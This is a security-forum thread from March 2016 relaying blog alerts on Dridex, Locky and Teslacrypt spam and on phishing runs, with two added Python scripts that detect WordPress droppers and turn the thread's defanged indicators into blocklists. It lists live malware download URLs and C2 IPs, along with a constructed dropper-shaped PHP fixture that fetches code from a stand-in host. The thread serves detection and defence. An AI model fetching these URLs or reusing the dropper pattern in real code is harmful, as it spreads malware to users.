Mar 7, 2016 - "... 'Because a W-2 form provides the employee’s name, Social Security number, address, and earnings information for the year with how much had been deducted for taxes, etc. – as well as the employer’s name and address – it provides everything criminals need to engage in tax refund fraud', Dissent, the privacy advocate running the Office of Inadequate Security blog*, explains. 'It used to be that in February and March, we’d see a number of reports-of-breaches involving employees’ W-2 tax statements that were due to printing or mailing errors. This year, we’re seeing reports of W-2 data-theft -via- phishing'. The blogger has been flagging reports of various companies being successfully targeted with this type of attack: Actifio, AmeriPride, Evening Post Industries, GCI, Main Line Health, and the latest, Seagate. Snapchat was hit earlier this month. And there are likely many more... instead of going directly after the money, the attackers are after information that can be used for stealing money. The fake emails almost always seem to be coming from the firm’s -CEO- asking the payroll -or- HR employee to send the employees’ W-2 forms, in PDF form, 'for review'... we can expect a continuing, steady stream of these emails hitting all types of companies. It remains on them to educate their staff so they don’t fall for it."
* http://www.databreac...ictims-in-2016/
Mar 7, 2016
 

:ph34r: :ph34r:   <_<


Edited by AplusWebMaster, 07 March 2016 - 03:13 PM.

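Added example for the CCTM item above; it is not from the post or from Sucuri's write-up. It scans a wp-content/plugins tree for PHP files shaped like the auto-update.php described there (fetch from a remote URL, then write into the plugin directory) or that eval decoded blobs. The fixture files, including the dropper-shaped one, are constructed for this example and are not the real backdoor. The regexes are heuristics, not signatures: they will also flag some legitimate updaters, so treat a hit as a file to diff against a clean copy of the plugin from the directory, not as proof on its own.

```python
import os
import re
import tempfile

# Heuristics (assumptions): a PHP file inside a plugin that calls a fetch
# function, mentions a remote URL and writes to disk has the shape of a dropper.
FETCH_CALL = re.compile(r"\b(file_get_contents|fopen|curl_exec|curl_init|wp_remote_get|wp_remote_post)\s*\(", re.I)
REMOTE_URL = re.compile(r"https?://", re.I)
LOCAL_WRITE = re.compile(r"\b(file_put_contents|fwrite|move_uploaded_file|copy|rename)\s*\(", re.I)
DYNAMIC_EVAL = re.compile(r"\b(eval|base64_decode|gzinflate|str_rot13)\s*\(", re.I)

def scan_php_source(src):
    """Return the list of heuristic hits for one PHP source string."""
    hits = []
    if FETCH_CALL.search(src) and REMOTE_URL.search(src) and LOCAL_WRITE.search(src):
        hits.append("remote fetch + local write (dropper)")
    if DYNAMIC_EVAL.search(src):
        hits.append("dynamic eval / decoding of embedded code")
    return hits

def scan_plugins_dir(plugins_dir):
    """Walk wp-content/plugins and return {relative_path: [hits]} for flagged PHP files."""
    flagged = {}
    for root, _, files in os.walk(plugins_dir):
        for fn in files:
            if not fn.lower().endswith(".php"):
                continue
            path = os.path.join(root, fn)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = scan_php_source(fh.read())
            if hits:
                flagged[os.path.relpath(path, plugins_dir)] = hits
    return flagged

# Constructed fixtures: two benign plugin files and one dropper-shaped file.
# The dropper text is a stand-in written for this example, not the real backdoor.
FIXTURES = {
    "custom-content-type-manager/index.php":
        "<?php\n/* Plugin Name: CCTM */\nadd_action('init', 'cctm_init');\n",
    "custom-content-type-manager/auto-update.php":
        "<?php\n$u = 'http://updates.example.invalid/f.txt';\n"
        "$d = file_get_contents($u);\n"
        "file_put_contents(__DIR__ . '/cache.php', $d);\n",
    "hello-dolly/hello.php":
        "<?php\nfunction hello_dolly() { echo 'Hello, Dolly'; }\n",
}

def write_fixtures(base):
    for rel, body in FIXTURES.items():
        full = os.path.join(base, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(body)
    return base

def scan_fixture_tree():
    """Write the fixtures to a temp dir, scan it, return findings keyed by '/'-style path."""
    with tempfile.TemporaryDirectory() as tmp:
        found = scan_plugins_dir(write_fixtures(tmp))
    return {k.replace(os.sep, "/"): v for k, v in found.items()}

if __name__ == "__main__":
    for path, hits in scan_fixture_tree().items():
        print(path, "->", "; ".join(hits))
```

On a real site the useful follow-up is the one the advisory gives: compare the installed plugin against the known-good 0.9.8.6 release file by file, and keep plugin auto-update off until the directory listing has been re-established.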


#1670 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • Authentic Member
  • PipPipPipPipPipPipPip
  • 10,472 posts
  • Interests:... The never-ending battle for Truth, Justice, and the American way.

Posted 08 March 2016 - 06:17 AM

FYI...

Fake 'Pay_Advice_Vendor' SPAM - JS malware leads to Dridex
- http://myonlinesecur...eads-to-dridex/
8 Mar 2016 - "An email with the subject of 'Pay_Advice_Vendor_0000300320_1000_for_03.03.2016' pretending to come from Accounts Payable <vendoramendments@ yorkshirewater .co.uk> with a zip attachment is another one from the current bot runs which downloads Dridex banking Trojan... The email looks like:
From: Accounts Payable <vendoramendments@ yorkshirewater .co.uk>
Date: Tue 08/03/2016 08:25
Subject: Pay_Advice_Vendor_0000300320_1000_for_03.03.2016
Attachment: Pay_Advice_Vendor_0000300320_1000_for_03.03.2016.PDF.ZIP
    Spotted a leak?
    If you spot a leak please report it immediately. Call us ...  
    Get a free water saving pack
    Don’t forget to request your free water and energy saving pack, it could save you money on your utility bills and help you conserve water..


8 March 2016: Pay_Advice_Vendor_0000300320_1000_for_03.03.2016.PDF.ZIP: Extracts to: LQO1169369605.js
Current Virus total detections 4/56*.. MALWR shows a download of what looks like Dridex banking Trojan from http ://reclamus .com/9uj8n76b5.exe (VirusTotal 2/56**). Other download locations so far discovered include
lhs-mhs .org/9uj8n76b5.exe | jatukarm-30 .com/9uj8n76b5.exe | stopmeagency.free .fr/9uj8n76b5.exe ... This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1457426128/

** https://www.virustot...sis/1457426412/
TCP connections
38.64.199.3: https://www.virustot....3/information/
8.253.82.126: https://www.virustot...26/information/

- http://blog.dynamoo....0003003201.html
8 Mar 2016 - "This -fake- financial spam does not come from Yorkshire Water but is instead a simple -forgery- with a malicious attachment.
    From     Accounts Payable [vendoramendments@ yorkshirewater .co.uk]
    Date     Tue, 08 Mar 2016 10:32:52 +0200
    Subject     Pay_Advice_Vendor_0000300320_1000_for_03.03.2016
    Spotted a leak?
    If you spot a leak please report it immediately. Call us...
    Get a free water saving pack
    Don't forget to request your free water and energy saving pack, it could save you
    money on your utility bills and help you conserve water...


I have only seen a single sample with an attachment named Pay_Advice_Vendor_0000300320_1000_for_03.03.2016.PDF.ZIP which contains a randomly-named malicious script with a detection rate of 3/54*. According to the Malwr report** and Hybrid Analysis*** on this sample, it downloads a malicious binary from:
lhs-mhs .org/9uj8n76b5.exe
This binary has a detection rate of 2/54[4] and all those reports indicate that it phones home to:
38.64.199.3 (PSINet, Canada)
I recommend that you -block- traffic to that IP. The Malwr report on the dropped binary is inconclusive, but it looks like the Dridex banking trojan."
* https://www.virustot...sis/1457426440/

** https://malwr.com/an...zJkMjlkOGZlOTk/
Hosts
208.131.141.2
38.64.199.3
184.25.56.34


*** https://www.hybrid-a...environmentId=4

4] https://www.virustot...sis/1457426850/
TCP connections
38.64.199.3: https://www.virustot....3/information/
8.253.82.126: https://www.virustot...26/information/
___

Fake 'Emailing' SPAM - JS attachment leads to Dridex
- http://myonlinesecur...eads-to-dridex/
8 Mar 2016 - "An email with the subject of 'Emailing: 20121005154449756' pretending to come from Gary Atkinson <Gary@ garrardwindows .co.uk> with a zip attachment is another one from the current bot runs which downloads Dridex banking Trojan... The email looks like:
From: Gary Atkinson <Gary@ garrardwindows .co.uk>
Date: Tue 08/03/2016 09:00
Subject: Emailing: 20121005154449756
Attachment:
    Please find attached document as requested.


8 March 2016:20121005154449756.zip: Extracts to: UIP3776229406.js - Current Virus total detections 3/56*
 MALWR** shows a download of Dridex banking Trojan from http ://lhs-mhs .org/9uj8n76b5.exe
(VirusTotal ***) which is the same binary as THIS post[4]... This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1457427965/

** https://malwr.com/an...TJlNDVkOWEyNzE/
Hosts
208.131.141.2
38.64.199.3
8.254.249.78


*** https://www.virustot...sis/1457427628/
TCP connections
38.64.199.3: https://www.virustot....3/information/
8.253.82.126: https://www.virustot...26/information/

4] http://myonlinesecur...eads-to-dridex/

- http://blog.dynamoo....5154449756.html
8 Mar 2016 - "This spam does -not- come from Garrard Windows but is instead a simple -forgery- with a malicious attachment:
    From     Gary Atkinson [Gary@ garrardwindows .co.uk]
    Date     Tue, 08 Mar 2016 12:09:33 +0300
    Subject     Emailing: 20121005154449756
    Please find attached document as requested.

Attached is a file 20121005154449756.zip which contains a randomly-named script. I have seen two samples so far (VirusTotal results [1]..). The Malwr reports [3].. show the script downloads from the following locations:
jatukarm-30 .com/9uj8n76b5.exe
stopmeagency .free.fr/9uj8n76b5.exe
The downloaded binary appears to be Dridex and is the -same- as found in this spam run*."
1] https://www.virustot...sis/1457429537/

2] https://malwr.com/an...DhlYzdmYWIyYWI/
Hosts
203.146.251.198
38.64.199.3
23.216.11.120


* http://blog.dynamoo....0003003201.html
___

Fake 'Order' SPAM - doc malware leads to Dridex
- http://myonlinesecur...eads-to-dridex/
8 Mar 2016 - "An email with the subject of 'Order 1307605 (Acknowledgement)' pretending to come from rick.adrio@ booles .co.uk with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
From: rick.adrio@ booles .co.uk
Date: Tue 08/03/2016 09:31
Subject: Order 1307605 (Acknowledgement)
Attachment: pm51A.docm
    Please find document attached ...


8 March 2016: pm51A.docm Current Virus total detections 5/55*
 MALWR** shows a download of Dridex banking Trojan from http ://kyudentyumi .web .fc2 .com/9uj8n76b5.exe
... which is the -same- Dridex Trojan version as described in today’s earlier posts where they are using .JS files inside zips to distribute the malware... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1457430327/

** https://malwr.com/an...TVkOGE3OTZhOTM/
Hosts
208.71.106.45
38.64.199.3
23.216.11.120


- http://blog.dynamoo....er-1307605.html
8 Mar 2016 - "This fake financial spam has a malicious attachment:
    From     rick.adrio@ booles .co.uk
    Date     Tue, 08 Mar 2016 15:58:07 +0530
    Subject     Order 1307605 (Acknowledgement)
    Please find document attached ...


Attached is a file pm51A.docm which I have seen two versions of (VirusTotal results [1] [2]). According to these Malwr reports [3] [4] and various other sources the macro in the document downloads from:
stopmeagency .free.fr/9uj8n76b5.exe
reclamus .com/9uj8n76b5.exe
lhs-mhs .org/9uj8n76b5.exe
izzy-cars .nl/9uj8n76b5.exe
kyudentyumi.wekyudentyumi .web.fc2 .com/9uj8n76b5.exe
The dropped binary has -changed- from earlier and has a detection rate of 2/55*, it phones home to the -same- IP address as seen in this campaign**. It appears to be the Dridex banking trojan."
1] https://www.virustot...sis/1457433767/

2] https://www.virustot...sis/1457433778/

3] https://malwr.com/an...jA5YTlmMzFiYmQ/
Hosts
46.235.47.134
38.64.199.3
13.107.4.50


4] https://malwr.com/an...Dg2ODFhZGY1MmE/
Hosts
208.131.141.2
38.64.199.3
13.107.4.50


* https://www.virustot...a5874/analysis/
TCP connections
38.64.199.3: https://www.virustot....3/information/
131.253.33.50: https://www.virustot...50/information/

** http://blog.dynamoo....0003003201.html
___

Fake 'FeDex-service' SPAM - malicious attachment
- http://blog.dynamoo....gent-fedex.html
8 Mar 2016 - "This -fake- FedEx spam has a malicious attachment:
    From:    FeDex-service
    Date:    8 March 2016 at 11:40
    Subject:    Samson Floyd agent Fedex
    Dear [redacted],
    We attempted to deliver your item on March 07th, 2016, 11:40 AM.
    The delivery attempt failed because the address was business closed or
    nobody could sign for it. To pick up the parcel,please, print the receipt
    that is attached to this email and visit Fedex office indicated in the
    invoice. If the package is not picked up within 48 hours, it will be returned
    to the shipper.
    Label: US45928402845 ...


Attached is a RAR archive file in this case named US45928460284.rar containing in turn a malicious script US45928460284.js ... This attempts to download an executable from:
www .fotoleonia .it/files/sample.exe
This has a VirusTotal detection rate of 4/54*. The Malwr report** shows a subsequent download from:
www .claudiocalaprice .com/modules/fedex/pad.exe
This has similar detections*** to the first binary. That Malwr report also indicates the binary POSTing data to:
pdf.repack .bike/new_and/state.php
This is hosted on:
151.80.76.200 (Kitdos, US / OVH, France)
I would suggest that the -entire- 151.80.76.200/29 range is questionable and should be -blocked-. None of the automated tools I ran... gave any insight as to what the malware does, but it is clearly something malicious."
* https://www.virustot...sis/1457437544/

** https://malwr.com/an...DZhMGMxMDQyNzU/
Hosts
78.83.32.3
172.217.3.35
172.217.0.67
62.149.142.172
129.70.132.34
8.8.4.4
23.100.122.175
151.80.76.200
62.149.142.151


*** https://www.virustot...sis/1457438147/
___

Fake 'Compensation' SPAM - JS malware leads to Locky Ransomware
- http://myonlinesecur...cky-ransomware/
8 Mar 2016 - "An email with the subject of 'Compensation – Reference Number #242852' [random numbered] coming from random names and email addresses with a zip attachment is another one from the current bot runs which downloads Locky Ransomware... The email looks like:
From: Lily Adams <AdamsLily33@ haleandheartymovers .com>
Date: Tue 08/03/2016 12:00
Subject: Compensation – Reference Number #242852
Attachment: SCAN_00_242852.zip
    Dear Customer,
    The mistake made will be compensated promptly, please do not worry.
    Please take a look at the file attached (scanned document) as it contains all the information.
    Sincerely,
    Lily Adams
    Sales Manager ...


8 March 2016: SCAN_00_242852.zip: Extracts to -2- different .JS files: accent.670345320.js
Current Virus total detections 1/56* and  email.141350705.js (VirusTotal 1/56**).. MALWR [1][2] shows both download of Locky ransomware from http ://lahmar.choukri.perso.neuf .fr/78hg4wg (VirusTotal ***).. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1457438201/

** https://www.virustot...sis/1457438200/

1] https://malwr.com/an...GM1MGFlNWM0NzE/
Hosts
86.65.123.70
37.235.53.18


2] https://malwr.com/an...jgzMzI2ODkyMjI/
Hosts
86.65.123.70
89.108.85.163


*** https://www.virustot...sis/1457439479/
TCP connections
89.108.85.163: https://www.virustot...63/information/
149.154.157.14: https://www.virustot...14/information/

- http://blog.dynamoo....-reference.html
8 Mar 2016 - "This -fake- financial spam comes with a malicious attachment:
    From:    Orval Burgess
    Date:    8 March 2016 at 11:10
    Subject:    Compensation - Reference Number #368380
    Dear Customer,
    The mistake made will be compensated promptly, please do not worry.
    Please take a look at the file attached (scanned document) as it contains all the information.
    Sincerely,
    Orval Burgess
    Account Manager


Attached is a file named in a similar format to SCAN_00_368380.zip which contains -TWO- malicious scripts named in a format similar to email.864036956.js (VirusTotal results [1]..) and automated analysis tools [5].. [9].. show binary download locations at:
ministerepuissancejesus .com/o097jhg4g5
ozono. org.es/k7j6h5gf
Those same reports indicate the malware attempts to phone home to the following IPs:
89.108.85.163 (Agava Ltd, Russia)
151.236.14.51 (EDIS, Netherlands)
149.154.157.14 (EDIS, Italy)
37.235.53.18 (EDIS, Spain)
192.121.16.196 (EDIS, Sweden)
Those automated reports all indicate that this is the Locky ransomware.
Recommended blocklist:
89.108.85.163
151.236.14.51
149.154.157.14
37.235.53.18
192.121.16.196
"
(More detail at the dynamoo URL above.)
1] https://www.virustot...e0616/analysis/

5] https://malwr.com/an...DdhNWFiYmVmOWQ/

9] https://www.hybrid-a...environmentId=4
email.297456567.js
email.931921928.js
email.374106319.js
email.864036956.js
___

Fake 'Invoice #' SPAM - JS malware leads to ransomware
- http://myonlinesecur...-to-ransomware/
8 Mar 2016 - "An email with the subject of 'FW: Invoice #733745-2016-03' [random numbered] pretending to come from random names and email addresses with a zip attachment is another one from the current bot runs which downloads a Locky Ransomware version... The email looks like:
From: Agnes Vaughan <VaughanAgnes08980@ speedy .com.ar>
Date: Tue 08/03/2016 15:12
Subject: FW: Invoice #733745-2016-03
Attachment:
    Dear ellie,
    Please see attached (scanned document) file for your invoice.
    Thank you for your business
    Agnes Vaughan
    Account Manager


8 March 2016: SCAN_2016_03_733745.zip: Extracts to: -2- slightly different sized .JS files
    accent.216401762.js (VT*) and accent.599656717.js (VT**)  
.. MALWR [1] [2] both show a download from http ://het-havenhuis .nl/099oj6hg (VirusTotal 15/57***)
... the second MALWR report clearly shows Locky.. Chrome & Firefox but -not- Internet Explorer -block- this site with big red warnings of malware... This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1457449790/

** https://www.virustot...sis/1457449826/

1] https://malwr.com/an...mRkYWM5ZjIwN2M/
Hosts
83.137.194.70
212.47.223.19
192.121.16.196
89.108.85.163


2] https://malwr.com/an...2ZlZTFiYmI5NTY/
Hosts
83.137.194.70
212.47.223.19
151.236.14.51


*** https://www.virustot...sis/1457450528/
TCP connections
37.235.53.18: https://www.virustot...18/information/
 



Edited by AplusWebMaster, 08 March 2016 - 02:55 PM.

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.
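The posts above publish their indicators in defanged form (a space before each dot, "http ://", "user@ domain") and close with "Recommended blocklist" entries that a practitioner has to refang by hand before feeding them to a firewall or DNS sinkhole. The script below is an added example, not code from the forum post or from the quoted myonlinesecurity/dynamoo blogs: it refangs that notation, pulls out IPs, hosts and download URLs, discards the truncated analysis-site links the thread uses as citations, and emits a sorted blocklist. SAMPLE_POST is a constructed excerpt in the same style as the posts; the REFERENCE_HOST_FRAGMENTS and FILE_EXTENSIONS filters are assumptions about what should never be treated as an indicator.

```python
"""Turn the defanged indicators quoted in this thread into a blocklist.

Added example (not from the forum post or the quoted blogs). SAMPLE_POST is a
constructed excerpt in the same defanged style; REFERENCE_HOST_FRAGMENTS and
FILE_EXTENSIONS are assumptions about what must never be treated as an IOC.
"""
import ipaddress
import re

SAMPLE_POST = """\
From: Accounts Payable <vendoramendments@ yorkshirewater .co.uk>
MALWR shows a download from http ://reclamus .com/9uj8n76b5.exe (VirusTotal 2/56**).
Other download locations so far discovered include
lhs-mhs .org/9uj8n76b5.exe | jatukarm-30 .com/9uj8n76b5.exe | stopmeagency.free .fr/9uj8n76b5.exe
www .fotoleonia .it/files/sample.exe
pdf.repack .bike/new_and/state.php
xn--b1afonddk2l .xn--p1ai/system/logs/7t6f65g.exe
it phones home to: 38.64.199.3 (PSINet, Canada)
I would suggest that the -entire- 151.80.76.200/29 range is questionable
Recommended blocklist:
89.108.85.163
151.236.14.51
38.64.199.3
* https://www.virustot...sis/1457426440/
** https://malwr.com/an...zJkMjlkOGZlOTk/
Attachment: Pay_Advice_Vendor_0000300320_1000_for_03.03.2016.PDF.ZIP
Extracts to: LQO1169369605.js
"""

# Analysis/reference links in these posts are often truncated ("virustot...");
# any host containing one of these fragments is a citation, not an indicator.
REFERENCE_HOST_FRAGMENTS = ("virustot", "malwr", "hybrid-a", "dynamoo",
                            "myonlinesecur", "reverse")
# Trailing labels that mark a file name (LQO1169369605.js) rather than a domain.
FILE_EXTENSIONS = {"zip", "rar", "js", "exe", "doc", "docm", "xls", "xlsm",
                   "pdf", "png", "jpg", "wav", "vbs"}

IP_RE = re.compile(r"(?<![\d.])(\d{1,3}(?:\.\d{1,3}){3})(?![\d.])")
URL_RE = re.compile(
    r"(?<![\w@.])"                                     # not mid-token, not after '@'
    r"(?:https?://)?"
    r"((?:[a-z0-9-]+\.)+(?:xn--[a-z0-9]+|[a-z]{2,}))"  # host: labels + TLD (IDN allowed)
    r"(/[^\s|)\"]*)?",                                 # optional path, stops at ' ' or '|'
    re.IGNORECASE,
)


def refang(text):
    """Undo the defanging: 'http ://a .b/x' -> 'http://a.b/x', 'u@ d .tld' -> 'u@d.tld'."""
    text = re.sub(r"[ \t]+(?=\.|://)", "", text)
    return re.sub(r"@[ \t]+", "@", text)


def extract_iocs(post_text):
    """Return {'ips': [...], 'domains': [...], 'urls': [...]} from a defanged post."""
    text = refang(post_text)
    ips = set()
    for candidate in IP_RE.findall(text):
        try:
            ips.add(str(ipaddress.IPv4Address(candidate)))  # rejects octets > 255
        except ValueError:
            continue
    domains, urls = set(), set()
    for host, path in URL_RE.findall(text):
        host = host.lower()
        if host.rsplit(".", 1)[-1] in FILE_EXTENSIONS:
            continue                                   # a file name, not a host
        if any(fragment in host for fragment in REFERENCE_HOST_FRAGMENTS):
            continue                                   # a citation link, not a host
        domains.add(host)
        if path:
            urls.add(host + path)
    return {
        "ips": sorted(ips, key=ipaddress.IPv4Address),
        "domains": sorted(domains),
        "urls": sorted(urls),
    }


def blocklist(post_text):
    """One entry per line for a firewall or DNS deny list: IPs first, then hosts."""
    iocs = extract_iocs(post_text)
    return iocs["ips"] + iocs["domains"]


if __name__ == "__main__":
    print("\n".join(blocklist(SAMPLE_POST)))
```

The sender domain (yorkshirewater .co.uk) is deliberately left out of the blocklist: the posts say the From address is a forgery, so blocking it would only hurt the spoofed company's legitimate mail. The `urls` list is kept separately because proxy and web-filter rules usually want the full download path rather than the whole host.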


#1671 AplusWebMaster
Posted 09 March 2016 - 07:50 AM

FYI...

Fake 'Invoice#' SPAM - JS malware leads to Teslacrypt
- http://myonlinesecur...ypt-ransomware/
9 Mar 2016 - "An email with the subject of 'Invoice #96187656 for your Order' [random numbered] pretending to come from Finance Information (random email addresses) with a zip attachment is another one from the current bot runs which downloads Teslacrypt ransomware... The email looks like:
From: Finance Information <root@ free-dreams .nl>
Date: Wed 09/03/2016 07:23
Subject: Invoice #96187656 for your Order
Attachment: invoice_SCAN_yzGbVV.zip
    Good day, dear client!
    We have recently shipped your parcel at you region post office.
    You can find the file bill of your shipment in the attachment. Make sure to check.
    Take care.
    Order/Invoice number:
    96187656
    Order/Invoice date:
    09.03.2016
    Accounts Department
    Wavenet Group
    Incorporating – Titan Technology, Centralcom and S1 Network Services ...


9 March 2016: invoice_SCAN_yzGbVV.zip: Extracts to: invoice_SCAN_yzGbVV.js - Current Virus total detections 8/57*
 MALWR** shows a download of Teslacrypt from http ://howareyouqq .com/25.exe?1 (VirusTotal ***)
NOTE: this also tries to download http ://google .com/25.exe?1 which does not exist and I can only assume that the bad actors have made a mistake in their coding and were probably trying to use the well known open redirect security hole in Google search and other google products... This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1457508873/

** https://malwr.com/an...mE3MTBlYWZmYzU/
Hosts
185.118.142.154
216.58.219.14


*** https://www.virustot...sis/1457503315/
TCP connections
50.87.28.241: https://www.virustot...41/information/
>> https://www.virustot...2f038/analysis/
___

Fake 'DOC' SPAM - malicious attachment
- http://blog.dynamoo....3008-idris.html
9 Mar 2016 - "This terse spam has a malicious attachment. There is -no- body text.
    From:    Idris Mohammed [idrismohammed25@ gmail .com]
    Date:    9 March 2016 at 09:55
    Subject:    DOC-Z21193008


Attached is a file img-DOC-Z21193008.docm which I have seen two versions of (VirusTotal results [1] [2]). Automated analysis [3] [4].. shows the macro in these two documents downloading from:
gpcarshop .com.br/system/logs/07yhnt7r64.exe
karnavalnye .com/system/logs/07yhnt7r64.exe
There are no doubt several -other- download locations. This binary has a detection rate of 3/56*. The various reports indicate that it phones home to a server at:
64.76.19.251 (Impsat, Argentina)
I strongly recommend that you -block- traffic to that IP. Payload is likely to be the Dridex banking trojan."
1] https://www.virustot...sis/1457517657/

2] https://www.virustot...sis/1457517660/

3] https://malwr.com/an...TEzNmQ0NjVhMDk/

4] https://malwr.com/an...jgyZTExN2U4ODE/

* https://www.virustot...sis/1457518357/
TCP connections
64.76.19.251
8.253.82.126


- http://myonlinesecur...eads-to-dridex/
9 Mar 2016 - "An email with the subject of 'DOC-Z21193008' pretending to come from Idris Mohammed <idrismohammed29@ gmail .com> (random numbers after idrismohammed) with a malicious word doc attachment is another one from the current bot runs... The email looks like:
From: Idris Mohammed <idrismohammed29@ gmail .com>
Date: Wed 09/03/2016 09:54
Subject:  DOC-Z21193008
Attachment: img-DOC-Z21193008.docm


Body content: completely blank

9 March 2016: img-DOC-Z21193008.docm - Current Virus total detections 4/56*
.. MALWR shows a download of Dridex banking Trojan from
 http ://karnavalnye .com/system/logs/07yhnt7r64.exe (VirusTotal 3/56**)...
DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1457518626/

** https://www.virustot...sis/1457518357/
TCP connections
64.76.19.251
8.253.82.126

___

Fake 'Voice msg' SPAM - JS malware leads to Dridex
- http://myonlinesecur...eads-to-dridex/
9 Mar 2016 - "An email with the subject of 'Voice Message Attached from +44163311902' – name unavailable [random numbered] pretending to come from voicemail <voicemail@ inclarity .net> with a zip attachment is another one from the current bot runs which downloads Dridex banking malware... The email looks like:
From: voicemail <voicemail@ inclarity .net>
Date:
Subject: Voice Message Attached from +44163311902 – name unavailable
Attachment: 44163311902_20160309_91981473.wav.zip
    Time: Wed, 09 Mar 2016 14:51:02 +0530
    Click attachment to listen to Voice Message


9 March 2016: 44163311902_20160309_91981473.wav.zip: Extracts to: WED2970789413.js - Current Virustotal detections 3/56*
.. MALWR** shows a download of Dridex banking Trojan from http ://variant13 .ru/system/logs/07yhnt7r64.exe  which is the -same- Dridex binary from THIS post***.. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1457519130/

** https://malwr.com/an...2QyMDA3NWUyMjk/
Hosts
37.140.192.62
64.76.19.251
13.107.4.50


*** http://myonlinesecur...eads-to-dridex/
___

Fake 'Invoice 2016' SPAM - JS malware leads to Locky Ransomware
- http://myonlinesecur...cky-ransomware/
9 Mar 2016 - "An email saying 'Please find attached 2 invoices for processing' with the subject of 'FW: Invoice 2016-M#184605' [random numbered] coming from random names and email addresses with a zip attachment is another one from the current bot runs which downloads Locky Ransomware... The email looks like:
From: Ann Guerrero <GuerreroAnn36420@ ono .com>
Date: Wed 09/03/2016 10:38
Subject: FW: Invoice 2016-M#184605
Attachment: Payment_2016_March_184605.zip
    Dear vbygry,
    Please find attached 2 invoices for processing.
    Yours sincerely,
    Ann Guerrero
    Account Manager ...


5 March 2016: Payment_2016_March_184605.zip: Extracts to -2- different files:  
problem.974210026.js [VT*] see_it.001832901.js [VT**]:
.. MALWR [1] [2] -both- show a download of Locky Ransomware from
 http ://planetarchery .com.au/system/logs/q32r45g54 (VirusTotal 5/57***)... This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1457523481/

** https://www.virustot...sis/1457523485/

1] https://malwr.com/an...GQ4OTVhYjExZWY/
Hosts
103.240.88.28
149.154.157.14


2] https://malwr.com/an...TIxZDVkYzViNzE/
Hosts
103.240.88.28
91.195.12.131


*** https://www.virustot...sis/1457524130/
TCP connections
149.154.157.14: https://www.virustot...14/information/

- http://blog.dynamoo....attached-2.html
9 Mar 2016 - "These -fake- financial spam emails come from random sources with different names and reference numbers:
    From:    Melisa Keller
    Date:    9 March 2016 at 12:08
    Subject:    FW: Invoice 2016-M#111812
    Dear server,
    Please find attached 2 invoices for processing.
    Yours sincerely,
    Melisa Keller
    Financial Manager ...


Attached is a file with a name similar to Payment_2016_March_111812.zip which contains -two- scripts, which in the samples I have seen all start with "see_it" or "problem". These malicious scripts all have low detection rates... there may be other download locations. The Malwr reports indicate that the malware phones home to:
78.40.108.39 (PS Internet Company LLC, Kazakhstan)
149.154.157.14 (EDIS, Italy)
The payload is the Locky ransomware.
UPDATE: I received the following information from another source (thank you)...
Additional C2s:
91.195.12.131 (PE Astakhov Pavel Viktorovich, Ukraine)
151.236.14.51 (EDIS, Netherlands)
37.235.53.18 (EDIS, Spain)
Recommended blocklist:
78.40.108.39
149.154.157.14
91.195.12.131
151.236.14.51
37.235.53.18
"
___

Fake 'from Admin' SPAM - JS malware leads to ransomware
- http://myonlinesecur...-to-ransomware/
9 Mar 2016 - "An email with the subject of 'DOC-AA25400B' [random numbered] pretending to come from -admin- <adm323@ victim_domain .tld> (the numbers after adm are random, the domain is your own email domain) with a zip attachment is another one from the current bot runs which downloads Locky Ransomware... The email looks like:
From: admin <adm323@ victim_domain .tld>
Date: Wed 09/03/2016 12:05
Subject: DOC-AA25400B
Attachment: DOC-AA25400B.zip


Totally -blank- body content

9 March 2016: DOC-AA25400B.zip: Extracts to: JGK9027615101.js - Current Virus total detections 5/57*
.. MALWR** shows a download of Locky Ransomware from
 http ://thietbianninhngocphuoc .com/system/logs/98yhb764d.exe (VirusTotal ***)... This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1457528965/

** https://malwr.com/an...zU0MmRkYzlhNmI/
Hosts
123.30.187.116: https://www.virustot...16/information/
>> https://www.virustot...bf15c/analysis/
78.40.108.39

*** https://www.virustot...sis/1457528686/
TCP connections
78.40.108.39: https://www.virustot...39/information/
___

AMEX 'PSK' PHISH
- http://myonlinesecur...y-psk-phishing/
9 Mar 2016 - "... a mass run of phishing emails -spoofing- American Express saying 'Please create your Personal Security Key'. There are -3- sites so far discovered that attempt to perform this phishing attack
    http ://americanexpressnew2016 .com/login
    http ://americanexpressglobal .com/login
    http ://axpoglobalverify .com/login
Currently all 3 sites fail to resolve from a UK IP address. They were all registered -yesterday- 8 March 2016 via Todaynic .com using Chinese details which I assume are false. The name servers associated with the domains are DNS1.NEWSITEDNS2 .RU and DNS2.NEWSITEDNS2 .RU
